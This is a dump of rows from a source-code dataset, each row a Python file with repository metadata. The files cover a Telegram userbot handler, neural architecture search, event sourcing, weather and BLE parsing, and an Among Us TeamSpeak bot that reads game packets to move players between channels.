@register(incoming=True, from_users=JARVIS, pattern="^.alive$")
async def jarvisalive(jarvis):
if jarvis.fwd_from:
return
if jarvis.is_reply:
reply = await jarvis.get_reply_message()
replytext = reply.text
reply_user = await jarvis.client.get_entity(reply.from_id)
ren = reply_user.id
if jarvis.sender_id == 1527722982:
xitab = "Sahibim"
else:
xitab = "Sahibim"
if ren == MYID:
Version = str(CYBER_VERSION.replace("v",""))
await jarvis.reply(f"`{xitab}` **C Y B Ξ R aktivdir...**\n**C Y B Ξ R Version:** `{CYBER_VERSION}`")
else:
return
else:
return
Help = CmdHelp('salive')
Help.add_command('salive', None, 'Gif-li alive mesajı')
Help.add()
| 30.318584 | 112 | 0.573847 | 438 | 3,426 | 4.506849 | 0.385845 | 0.036474 | 0.009119 | 0.006079 | 0.110436 | 0.078521 | 0.06079 | 0.024316 | 0 | 0 | 0 | 0.016546 | 0.276708 | 3,426 | 112 | 113 | 30.589286 | 0.755044 | 0.044658 | 0 | 0.159574 | 0 | 0.010638 | 0.183711 | 0.021739 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.085106 | 0 | 0.12766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6507cbc00efcf07f19f2cd7f19240245f2ab1c12 | 5,071 | py | Python | nnabla_nas/runner/searcher/pnas.py | sony/nnabla-nas | 269deb8229fda0f0901c47d21ac5ce244f403f63 | [
"Apache-2.0"
] | 16 | 2020-07-10T08:31:18.000Z | 2022-03-24T13:28:15.000Z | nnabla_nas/runner/searcher/pnas.py | sony/nnabla-nas | 269deb8229fda0f0901c47d21ac5ce244f403f63 | [
"Apache-2.0"
] | 1 | 2020-10-21T12:46:30.000Z | 2021-02-03T00:18:29.000Z | nnabla_nas/runner/searcher/pnas.py | sony/nnabla-nas | 269deb8229fda0f0901c47d21ac5ce244f403f63 | [
"Apache-2.0"
] | 3 | 2020-07-15T11:42:11.000Z | 2022-03-25T16:54:49.000Z | # Copyright (c) 2020 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nnabla as nn
import numpy as np
from .search import Searcher
from nnabla_nas.utils.estimator.latency import LatencyEstimator
from nnabla_nas.utils.estimator.latency import LatencyGraphEstimator
class ProxylessNasSearcher(Searcher):
r""" ProxylessNAS: Direct Neural Architecture Search on Target Task and
Hardware.
"""
def callback_on_start(self):
r"""Gets the architecture parameters."""
self._reward = nn.NdArray.from_numpy_array(np.zeros((1,)))
def train_on_batch(self, key='train'):
r"""Update the model parameters."""
self.update_graph(key)
params = self.model.get_net_parameters(grad_only=True)
self.optimizer[key].set_parameters(params)
bz, p = self.mbs_train, self.placeholder['train']
self.optimizer[key].zero_grad()
if self.comm.n_procs > 1:
grads = [x.grad for x in params.values()]
self.event.default_stream_synchronize()
for _ in range(self.accum_train):
self._load_data(p, self.dataloader['train'].next())
p['loss'].forward(clear_no_need_grad=True)
for k, m in p['metrics'].items():
m.forward(clear_buffer=True)
self.monitor.update(f'{k}/train', m.d.copy(), bz)
p['loss'].backward(clear_buffer=True)
loss = p['loss'].d.copy()
self.monitor.update('loss/train', loss * self.accum_train, bz)
if self.comm.n_procs > 1:
self.comm.all_reduce(grads, division=True, inplace=False)
self.event.add_default_stream_event()
self.optimizer[key].update()
def valid_on_batch(self):
r"""Update the arch parameters."""
beta, n_iter = 0.9, 10
bz, p = self.mbs_valid, self.placeholder['valid']
valid_data = [self.dataloader['valid'].next()
for i in range(self.accum_valid)]
rewards, grads = [], []
if self.comm.n_procs > 1:
self.event.default_stream_synchronize()
for _ in range(n_iter):
reward = 0
self.update_graph('valid')
arch_params = self.model.get_arch_parameters(grad_only=True)
self.optimizer['valid'].set_parameters(arch_params)
for minibatch in valid_data:
self._load_data(p, minibatch)
p['loss'].forward(clear_buffer=True)
for k, m in p['metrics'].items():
m.forward(clear_buffer=True)
self.monitor.update(f'{k}/valid', m.d.copy(), bz)
loss = p['loss'].d.copy()
reward += (1 - p['metrics']['error'].d) / self.accum_valid
self.monitor.update('loss/valid', loss * self.accum_valid, bz)
# adding constraints
for k, v in self.optimizer.get('regularizer', {}).items():
if isinstance(v, LatencyGraphEstimator):
# when using LatencyGraphEstimator (by graph)
inp = [nn.Variable((1,)+si[1:]) for si in
self.model.input_shapes]
out = self.model.call(*inp)
value = v.get_estimation(out)
elif isinstance(v, LatencyEstimator):
# when using LatencyEstimator (by module)
value = v.get_estimation(self.model)
else:
raise NotImplementedError
reward *= (min(1.0, v._bound / value))**v._weight
self.monitor.update(k, value, 1)
rewards.append(reward)
grads.append([m.g.copy() for m in arch_params.values()])
# compute gradients
for j, m in enumerate(arch_params.values()):
m.grad.zero()
for i, r in enumerate(rewards):
m.g += (r - self._reward.data)*grads[i][j]/n_iter
# update global reward
self._reward.data = beta*sum(rewards)/n_iter + \
(1 - beta)*self._reward.data
if self.comm.n_procs > 1:
self.comm.all_reduce(
[x.grad for x in arch_params.values()],
division=True,
inplace=False
)
self.comm.all_reduce(self._reward, division=True, inplace=False)
self.event.add_default_stream_event()
self.monitor.update('reward', self._reward.data[0], self.bs_valid)
self.optimizer['valid'].update()
| 39.310078 | 78 | 0.592585 | 638 | 5,071 | 4.583072 | 0.31348 | 0.019152 | 0.034884 | 0.015048 | 0.227086 | 0.20041 | 0.170657 | 0.137483 | 0.108071 | 0.108071 | 0 | 0.00724 | 0.291856 | 5,071 | 128 | 79 | 39.617188 | 0.807018 | 0.175902 | 0 | 0.162791 | 0 | 0 | 0.034132 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034884 | false | 0 | 0.05814 | 0 | 0.104651 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
650816ad102306b4e782ed36bd66e6c3a46bdff8 | 2,285 | py | Python | event_sourced_bank/transaction_log_service.py | sfinnie/event_sourced_bank | dcec864724e85ac8049a377ee2f6e2c05b1b6a2c | [
"MIT"
] | 5 | 2022-02-17T05:54:49.000Z | 2022-03-09T20:13:21.000Z | event_sourced_bank/transaction_log_service.py | sfinnie/event_sourced_bank | dcec864724e85ac8049a377ee2f6e2c05b1b6a2c | [
"MIT"
] | 2 | 2022-02-17T14:19:16.000Z | 2022-02-17T14:21:31.000Z | event_sourced_bank/transaction_log_service.py | sfinnie/event_sourced_bank | dcec864724e85ac8049a377ee2f6e2c05b1b6a2c | [
"MIT"
] | 1 | 2022-03-03T05:03:23.000Z | 2022-03-03T05:03:23.000Z | from uuid import UUID, uuid5, NAMESPACE_URL
from eventsourcing.system import ProcessApplication
from eventsourcing.dispatch import singledispatchmethod
from event_sourced_bank.domain_model import Account
from eventsourcing.application import EventSourcedLog, LogEvent
import logging
class AccountEvent(LogEvent):
account_id: UUID
transaction_type: str
amount: int = 0
class TransactionLogService(ProcessApplication):
"""Listens for all account transaction events and
saves them into a log"""
def __init__(self, env=None) -> None:
super().__init__(env=env)
self.transaction_log = EventSourcedLog(
events=self.events,
originator_id=uuid5(NAMESPACE_URL, "/transactions"),
logged_cls=AccountEvent,
)
@singledispatchmethod
def policy(self, domain_event, process_event):
"""Default policy"""
@policy.register(Account.Created)
def add_created_txn(self, domain_event, process_event) -> None:
event = self.transaction_log.trigger_event(account_id=domain_event.originator_id,
transaction_type="Creation",
amount=0)
self.save(event)
@policy.register(Account.Credited)
def add_credit_txn(self, domain_event, process_event) -> None:
event = self.transaction_log.trigger_event(account_id=domain_event.originator_id,
transaction_type="Credit",
amount=domain_event.amount)
self.save(event)
@policy.register(Account.Debited)
def add_debit_txn(self, domain_event, process_event) -> None:
event = self.transaction_log.trigger_event(account_id=domain_event.originator_id,
transaction_type="Debit",
amount=domain_event.amount)
self.save(event)
def get_transactions(self):
txns = [{"account_id": txn.account_id,
"timestamp": txn.timestamp,
"amount": txn.amount,
"type": txn.transaction_type} for txn in self.transaction_log.get()]
return txns
| 38.083333 | 89 | 0.617943 | 231 | 2,285 | 5.865801 | 0.30303 | 0.073063 | 0.066421 | 0.064945 | 0.37048 | 0.350554 | 0.309963 | 0.256827 | 0.256827 | 0.256827 | 0 | 0.002509 | 0.302407 | 2,285 | 59 | 90 | 38.728814 | 0.847553 | 0.036324 | 0 | 0.181818 | 0 | 0 | 0.02793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.136364 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65081cd26e674a3288fc0ad9ebda72bf4b1a9b9f | 296 | py | Python | example/example.py | fl16180/gtrends-tools | 7af4c9b18345911aa8642eb9a45d4291bb1a4017 | [
"MIT"
] | 3 | 2018-10-05T17:56:18.000Z | 2020-03-27T18:21:04.000Z | example/example.py | fl16180/gtrends-tools | 7af4c9b18345911aa8642eb9a45d4291bb1a4017 | [
"MIT"
] | 1 | 2020-10-05T23:46:26.000Z | 2020-10-27T00:17:45.000Z | example/example.py | fl16180/gtrends-tools | 7af4c9b18345911aa8642eb9a45d4291bb1a4017 | [
"MIT"
] | 2 | 2018-09-12T19:05:09.000Z | 2021-04-12T02:53:30.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import healthtrends
DIR = './'
queries = ['tofu', 'exercise']
gt = healthtrends.TrendsSession(api_key='xxx')
gt.request_trends(term_list=queries, geo_level='country', geo_id='US')
gt.save_to_csv(directory=DIR, fname='healthy_trends.csv')
| 22.769231 | 71 | 0.682432 | 40 | 296 | 4.85 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003891 | 0.131757 | 296 | 12 | 72 | 24.666667 | 0.750973 | 0.128378 | 0 | 0 | 0 | 0 | 0.180328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
650ebc6e0d16246ba1010006e0f6067b875b37b0 | 2,643 | py | Python | model/weather.py | otti0815/EInk-Calendar | c2f21598bdba930959ca9e3fc2aea3e61bfff836 | [
"MIT"
] | null | null | null | model/weather.py | otti0815/EInk-Calendar | c2f21598bdba930959ca9e3fc2aea3e61bfff836 | [
"MIT"
] | null | null | null | model/weather.py | otti0815/EInk-Calendar | c2f21598bdba930959ca9e3fc2aea3e61bfff836 | [
"MIT"
] | null | null | null | import datetime
from pyowm import OWM
class OpenWeatherMapModel:
def __init__(self, api_key: str, city_id: int):
self.owm = OWM(api_key)
self._city_id = city_id
self._unit = 'celsius'
self._current_weather = (0, 0, 0, 0, 0)
self._forecast = []
@property
def city_id(self):
return self._city_id
@city_id.setter
def city_id(self, city_id: int):
self._city_id = city_id
@property
def temperature_unit(self):
return self._unit
@temperature_unit.setter
def temperature_unit(self, unit: str):
assert unit == 'fahrenheit' or unit == 'celsius'
self._unit = unit
def _parse_weather(self, weather):
temperature = weather.get_temperature(unit=self.temperature_unit)
humidity = weather.get_humidity()
weather_code = weather.get_weather_code()
return (weather_code,
temperature.get('temp_min', temperature.get('min')),
temperature.get('temp_max', temperature.get('max')),
temperature.get('temp'),
humidity)
def get_current_weather(self):
"""
Get the current weather data
:return: Tuple of weather code, temperature range, current temperature
and humidity
"""
try:
obs = self.owm.weather_at_id(self.city_id)
weather = obs.get_weather()
self._current_weather = self._parse_weather(weather)
except Exception as exception:
print(exception)
return self._current_weather
def get_daily_forecast(self, limit=14, include_today=False):
"""
Get a list of forecasts
:param limit: The max number of forecasts to get
:param include_today: whether include today in the forecast
:return: list of tuples of weather code, temperature range, temperature
and humidity
"""
try:
forecaster = self.owm.daily_forecast_at_id(self.city_id,
limit=limit)
weathers = forecaster.get_forecast().get_weathers()
today = datetime.datetime.now().date()
if not include_today:
weathers = filter(
lambda weather: not (weather.get_reference_time(
timeformat='date').date() == today), weathers)
self._forecast = list(
map(lambda weather: self._parse_weather(weather), weathers))
except Exception as exception:
print(exception)
return self._forecast
| 34.324675 | 79 | 0.591752 | 293 | 2,643 | 5.105802 | 0.259386 | 0.048128 | 0.040107 | 0.028075 | 0.196524 | 0.066845 | 0.066845 | 0.066845 | 0 | 0 | 0 | 0.003904 | 0.321604 | 2,643 | 76 | 80 | 34.776316 | 0.830452 | 0.131669 | 0 | 0.185185 | 0 | 0 | 0.024545 | 0 | 0 | 0 | 0 | 0 | 0.018519 | 1 | 0.148148 | false | 0 | 0.037037 | 0.037037 | 0.296296 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6511059cc50336446b681997c39676c41f12de34 | 4,910 | py | Python | igsparser/advertisement.py | timscchao/ingics-message-parser-py | 865eca5fc8245d2b9b577085a201eaa3c139ada1 | [
"MIT"
] | null | null | null | igsparser/advertisement.py | timscchao/ingics-message-parser-py | 865eca5fc8245d2b9b577085a201eaa3c139ada1 | [
"MIT"
] | 1 | 2021-05-20T07:11:34.000Z | 2021-05-20T07:11:34.000Z | igsparser/advertisement.py | timscchao/ingics-message-parser-py | 865eca5fc8245d2b9b577085a201eaa3c139ada1 | [
"MIT"
] | null | null | null | import uuid
import struct
import pprint
from .appearance import appearanceList
from .msd import Msd
class Advertisement:
def __init__(self, payload):
self.raw = bytearray.fromhex(payload)
self.flags = None
self.localName = None
self.txPowerLevel = None
self.manufacturerData = None
self.serviceData = []
self.serviceUuids = []
self.serviceSolicitationUuids = []
self.parse()
def __repr__(self):
return pprint.pformat(vars(self))
def parse(self):
i = 0
length = len(self.raw)
while i < length:
adLength = self.raw[i]
# handling some beacon append '00..' in the end of payload
if adLength == 0:
break
adType = self.raw[i + 1]
adData = self.raw[i + 2: i + adLength + 1]
# Flags
if adType == 0x01:
self.flags = struct.unpack('B', bytes(adData))[0]
# Complete List of 16-bit Service Class UUIDs
elif adType == 0x03:
adData.reverse()
self.serviceUuids.append(bytes(adData).hex().upper())
# Complete List of 128-bit Service Class UUIDs
elif adType == 0x07:
adData.reverse()
self.serviceUuids.append(str(uuid.UUID(bytes(adData).hex())).upper())
# Shortened Local Name
# Complete Local Name
elif adType == 0x08 or adType == 0x09:
self.localName = adData.decode('utf-8')
# Tx Power Level
elif adType == 0x0A:
self.txPowerLevel = struct.unpack('b', bytes(adData))[0]
# Service Data - 16-bit UUID
elif adType == 0x16:
serviceUuid = struct.unpack('H', bytes(adData[0:2]))[0]
serviceData = adData[2:]
self.serviceData.append({
'uuid': serviceUuid,
'data': bytes(serviceData)
})
serviceData.reverse()
if serviceUuid == 0x2AC3:
# org.bluetooth.characteristic.object_id
self.objectId = bytes(serviceData).hex().upper()
elif serviceUuid == 0x2A6E:
# org.bluetooth.characteristic.temperature
self.temperature = struct.unpack('h', bytes(serviceData))[0] / 100
self.temperatureUnit = 'C'
elif serviceUuid == 0x2A1F:
# org.bluetooth.unit.thermodynamic_temperature.degree_celsius
self.temperature = struct.unpack('h', bytes(serviceData))[0] / 10
self.temperatureUnit = 'C'
elif serviceUuid == 0x2A20:
# org.bluetooth.unit.thermodynamic_temperature.degree_fahrenheit
self.temperature = struct.unpack('h', bytes(serviceData))[0] / 10
self.temperatureUnit = 'F'
elif serviceUuid == 0x2A6F:
# org.bluetooth.characteristic.humidity
self.humidity = struct.unpack('h', bytes(serviceData))[0] / 100
# List of 16-bit Service Solicitation UUIDs
# List of 32-bit Service Solicitation UUIDs
elif adType == 0x14 or adType == 0x1F:
adData.reverse()
self.serviceSolicitationUuids.append(bytes(adData).hex().upper())
# List of 128 bit Service Solicitation UUIDs
elif adType == 0x15:
adData.reverse()
self.serviceSolicitationUuids.append(str(uuid.UUID(bytes(adData).hex())).upper())
# Appearance
elif adType == 0x19:
val = str(struct.unpack('H', bytes(adData))[0])
self.apperance = appearanceList[val] if val in appearanceList else val
# Service Data - 32-bit UUID
elif adType == 0x20:
serviceUuid = adData[0:4]
serviceData = adData[4:]
serviceUuid.reverse()
serviceData.reverse()
self.serviceData.append({
'uuid': bytes(serviceUuid).hex().upper(),
'data': bytes(serviceData).hex().upper()
})
# Service Data - 128-bit UUID
elif adType == 0x21:
serviceUuid = adData[0:16]
serviceData = adData[16:]
serviceUuid.reverse()
serviceData.reverse()
self.serviceData.append({
'uuid': str(uuid.UUID(bytes(serviceUuid).hex())).upper(),
'data': bytes(serviceData).hex().upper()
})
# Manufacturer Specific Data
elif adType == 0xFF:
self.manufacturerData = Msd(adData)
i += adLength + 1
| 42.327586 | 97 | 0.519959 | 459 | 4,910 | 5.533769 | 0.270153 | 0.043307 | 0.030709 | 0.04252 | 0.443307 | 0.331102 | 0.202756 | 0.188583 | 0.096063 | 0.096063 | 0 | 0.036286 | 0.376986 | 4,910 | 115 | 98 | 42.695652 | 0.79405 | 0.141548 | 0 | 0.233333 | 0 | 0 | 0.009537 | 0 | 0 | 0 | 0.020505 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.055556 | 0.011111 | 0.111111 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651372c7def59ca028c6393016324ca2c8e36168 | 13,519 | py | Python | ts3_bot.py | lukegb/amongus | e03bf5e19db78e6c318d63739614fae78ff7f331 | [
"Apache-2.0"
] | 8 | 2020-10-25T00:16:06.000Z | 2021-05-12T08:39:27.000Z | ts3_bot.py | lukegb/amongus | e03bf5e19db78e6c318d63739614fae78ff7f331 | [
"Apache-2.0"
] | null | null | null | ts3_bot.py | lukegb/amongus | e03bf5e19db78e6c318d63739614fae78ff7f331 | [
"Apache-2.0"
] | null | null | null | # SPDX-FileCopyrightText: 2020 Luke Granger-Brown
#
# SPDX-License-Identifier: Apache-2.0
import dataclasses
import multiprocessing
import queue
import threading
import time
from typing import FrozenSet, List
from absl import app
from absl import flags
from absl import logging
import scapy.all
import ts3
import amongus.rpcs
import amongus.state_tracker
FLAGS = flags.FLAGS
flags.DEFINE_string(
"connection_string",
None,
"py-ts3 connection string (e.g. ssh://serveradmin:foooo@localhost:10022)",
)
flags.DEFINE_integer("server_id", 1, "Server ID of virtual server to use.")
flags.DEFINE_integer(
"main_channel_id", 62, "Main channel ID (for people who are alive, etc.)"
)
flags.DEFINE_integer("dead_channel_id", 65, "Dead channel ID (for people who are dead)")
flags.DEFINE_integer("alive_server_group", 25, "Server group to add alive people to")
flags.DEFINE_integer("dead_server_group", 24, "Server group to add dead people to")
# flags.DEFINE_integer("observer_server_group", 11, "Server group to treat as observers")
flags.DEFINE_integer(
"round_live_talk_power", 300, "Talk power to set main channel to during rounds"
)
flags.DEFINE_integer(
"round_discuss_talk_power",
200,
"Talk power to set main channel to during discussion time",
)
flags.DEFINE_integer(
"game_dead_talk_power",
0,
"Talk power to set main channel to when game isn't happening",
)
flags.DEFINE_integer(
"keepalive_interval_seconds",
60,
"Interval between sending TS3 serverquery keepalives",
)
class UsernameDatabase:
def __init__(self, data):
self.usernames_to_ts3_db_ids = {}
self.ts3_db_ids_to_usernames = {}
for usernames, client_ids in data:
for username in usernames:
self.usernames_to_ts3_db_ids[username] = list(client_ids)
for client_id in client_ids:
self.ts3_db_ids_to_usernames[client_id] = list(usernames)
def usernames_from_db_id(self, db_id):
return self.ts3_db_ids_to_usernames.get(db_id, [])
def db_ids_from_username(self, username):
return self.usernames_to_ts3_db_ids.get(username, [])
USERNAME_DB = UsernameDatabase(
[
(("Memories",), (240,)),
(("Zenras", "Giblets", "Stelbig"), (279,)),
(("Mumfrey",), (112,)),
(("SilvaJ",), (199,)),
(("th0rney",), (146,)),
(("HDWolfGamer",), (276,)),
(("lukegb",), (164,)),
(
("felltir",),
(
205,
243,
),
),
(
("NSE",),
(
171,
177,
288,
),
),
(
("Rosalyan",),
(
174,
269,
),
),
(("BrackishBrit",), (168,)),
(
("sirrambod",),
(
122,
155,
178,
),
),
(("Echo",), (302,)),
]
)
@dataclasses.dataclass(frozen=True, eq=True)
class GameState:
round_state: amongus.state_tracker.RoundState = (
amongus.state_tracker.RoundState.LOBBY
)
alive_players: FrozenSet[str] = dataclasses.field(default_factory=frozenset)
dead_players: FrozenSet[str] = dataclasses.field(default_factory=frozenset)
@dataclasses.dataclass(frozen=True)
class TS3Client:
client_name: str
client_id: int
client_database_id: int
channel_id: int
server_groups: List[int]
class TS3Bot:
def __init__(self, ts3conn, queue):
self.ts3conn = ts3conn
self.queue = queue
self.last_keepalive = None
self.state = GameState()
def send_keepalive_if_needed(self):
now = time.monotonic()
if (
self.last_keepalive is not None
and (now - self.last_keepalive) < FLAGS.keepalive_interval_seconds
):
return
logging.info("Sending TS3 serverquery keepalive")
self.last_keepalive = now
self.ts3conn.send_keepalive()
def online_clients(self):
online_clients = []
for client in self.ts3conn.exec_("clientlist", "groups").parsed:
if client["client_type"] != "0":
continue
online_clients.append(
TS3Client(
client_name=client["client_nickname"],
client_id=int(client["clid"]),
client_database_id=int(client["client_database_id"]),
channel_id=int(client["cid"]),
server_groups=frozenset(
int(n) for n in client["client_servergroups"].split(",")
),
)
)
return online_clients
@classmethod
def _lowercase_names(cls, names):
return (n.lower() for n in names)
@classmethod
def _is_player_in_list(cls, client, player_names):
return any(
(un in cls._lowercase_names(player_names))
for un in cls._lowercase_names(
USERNAME_DB.usernames_from_db_id(client.client_database_id)
)
)
def sync_server_group_with_list(self, sgid, player_names, online_clients):
current_clients = set()
for client in online_clients:
if sgid in client.server_groups:
current_clients.add(client)
want_clients = set()
for client in online_clients:
if self._is_player_in_list(client, player_names):
want_clients.add(client)
modified_database_ids = set()
to_add = want_clients - current_clients
to_remove = current_clients - want_clients
for client in to_add:
logging.info("Adding %s to server group %d", str(client), sgid)
if client.client_database_id in modified_database_ids:
continue
modified_database_ids.add(client.client_database_id)
self.ts3conn.exec_(
"servergroupaddclient", sgid=sgid, cldbid=client.client_database_id
)
for client in to_remove:
logging.info("Removing %s from server group %d", str(client), sgid)
if client.client_database_id in modified_database_ids:
continue
modified_database_ids.add(client.client_database_id)
self.ts3conn.exec_(
"servergroupdelclient", sgid=sgid, cldbid=client.client_database_id
)
def sync_server_groups(self, online_clients):
want_alive_players = self.state.alive_players
want_dead_players = self.state.dead_players
if self.state.round_state in (
amongus.state_tracker.RoundState.LOBBY,
amongus.state_tracker.RoundState.POSTGAME,
):
want_alive_players = []
want_dead_players = []
self.sync_server_group_with_list(
FLAGS.alive_server_group,
self.state.alive_players,
online_clients,
)
self.sync_server_group_with_list(
FLAGS.dead_server_group, self.state.dead_players, online_clients
)
def sync_main_channel_status(self):
target_channel_topic = self.state.round_state.value
if self.state.round_state in (
amongus.state_tracker.RoundState.LOBBY,
amongus.state_tracker.RoundState.POSTGAME,
):
target_channel_talk_power = FLAGS.game_dead_talk_power
elif self.state.round_state == amongus.state_tracker.RoundState.MEETING:
target_channel_talk_power = FLAGS.round_discuss_talk_power
else:
target_channel_talk_power = FLAGS.round_live_talk_power
current_status = self.ts3conn.exec_("channelinfo", cid=FLAGS.main_channel_id)
current_channel_talk_power = int(
current_status.parsed[0]["channel_needed_talk_power"]
)
current_channel_topic = current_status.parsed[0]["channel_topic"]
if (
current_channel_talk_power != target_channel_talk_power
or current_channel_topic != target_channel_topic
):
logging.info(
"Updating channel id=%d with talk power=%d and topic=%s",
FLAGS.main_channel_id,
target_channel_talk_power,
target_channel_topic,
)
self.ts3conn.exec_(
"channeledit",
cid=FLAGS.main_channel_id,
channel_needed_talk_power=target_channel_talk_power,
channel_topic=target_channel_topic,
)
def _move_people_matching_predicate(self, online_clients, predicate, cid, log_text):
to_move = set()
for client in online_clients:
if predicate(client):
logging.info("Moving client %s %s", str(client), log_text)
to_move.add(client)
if to_move:
cmd = self.ts3conn.query("clientmove", cid=cid)
for client in to_move:
cmd = cmd.pipe(clid=client.client_id)
cmd.fetch()
def move_people(self, online_clients):
if self.state.round_state in (
amongus.state_tracker.RoundState.LOBBY,
amongus.state_tracker.RoundState.POSTGAME,
amongus.state_tracker.RoundState.MEETING,
):
# Empty the ghost lobby.
self._move_people_matching_predicate(
online_clients,
lambda client: client.channel_id == FLAGS.dead_channel_id,
FLAGS.main_channel_id,
"out of dead channel into main lobby",
)
elif self.state.round_state == amongus.state_tracker.RoundState.ACTIVE:
# Moving ghosts to ghost lobby.
self._move_people_matching_predicate(
online_clients,
lambda client: client.channel_id == FLAGS.main_channel_id
and self._is_player_in_list(client, self.state.dead_players),
FLAGS.dead_channel_id,
"INTO dead channel",
)
def sync(self):
online_clients = self.online_clients()
self.sync_server_groups(online_clients)
self.sync_main_channel_status()
self.move_people(online_clients)
def run(self):
self.ts3conn.exec_("use", sid=1)
self.ts3conn.exec_("servernotifyregister", event="server")
self.ts3conn.exec_("servernotifyregister", event="channel", id=0)
self.sync()
while True:
self.send_keepalive_if_needed()
try:
event = self.ts3conn.wait_for_event(timeout=0.2)
self.sync()
except ts3.query.TS3TimeoutError:
pass
try:
result = self.queue.get_nowait()
self.state = result
self.sync()
except queue.Empty:
pass
class ListenerThread(threading.Thread):
def __init__(self, queue, **kwargs):
super().__init__(**kwargs)
self.queue = queue
self.state = amongus.state_tracker.GameState()
self.my_state = GameState()
def process_packet(self, pkt):
if not self.state.process_packet(pkt):
return
round_state = self.state.round_state
changes = {"round_state": round_state}
if (
round_state == amongus.state_tracker.RoundState.LOBBY
or round_state == amongus.state_tracker.RoundState.MEETING
or amongus.rpcs.VotingCompleteRPC in pkt
or amongus.rpcs.SetInfectedRPC in pkt
):
# Update dead/alive players.
game_data = self.state.find_netobj_of_type(
amongus.state_tracker.NetObjGameData
)
if not game_data:
logging.error(
"NetObjGameData missing when in MEETING state :( - no idea what's going on"
)
return
living_players = set()
dead_players = set()
for p in game_data.players:
if p.is_dead:
dead_players.add(p.name)
else:
living_players.add(p.name)
changes.update(
alive_players=frozenset(living_players),
dead_players=frozenset(dead_players),
)
new_my_state = dataclasses.replace(self.my_state, **changes)
if new_my_state != self.my_state:
logging.info("New state: %s", str(new_my_state))
self.queue.put(new_my_state)
self.my_state = new_my_state
def run(self):
state = amongus.state_tracker.GameState()
logging.info("listener ready")
scapy.all.sniff(
prn=self.process_packet, filter="udp and (src port 22023 or dst port 22023)"
)
def main(argv):
if len(argv) != 1:
raise app.UsageError("Too many arguments.")
if not FLAGS.connection_string:
raise app.UsageError("--connection_string is required.")
scapy.all.conf.use_pcap = True
scapy.all.conf.sniff_promisc = False
queue = multiprocessing.Queue()
listener_thread = ListenerThread(queue, daemon=True)
listener_thread.start()
with ts3.query.TS3ServerConnection(FLAGS.connection_string) as ts3conn:
bot = TS3Bot(ts3conn, queue)
bot.run()
if __name__ == "__main__":
app.run(main)
| 33.629353 | 95 | 0.600266 | 1,518 | 13,519 | 5.066535 | 0.201581 | 0.023404 | 0.041997 | 0.049018 | 0.344819 | 0.264465 | 0.186062 | 0.141204 | 0.108178 | 0.094656 | 0 | 0.01508 | 0.308381 | 13,519 | 401 | 96 | 33.713217 | 0.807487 | 0.018566 | 0 | 0.205128 | 0 | 0 | 0.109427 | 0.010256 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054131 | false | 0.005698 | 0.037037 | 0.011396 | 0.150997 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65146ef8dc35caec09ada8e0674533c36180a7c2 | 4,469 | py | Python | Packs/Dig/Scripts/Dig/Dig.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/Dig/Scripts/Dig/Dig.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
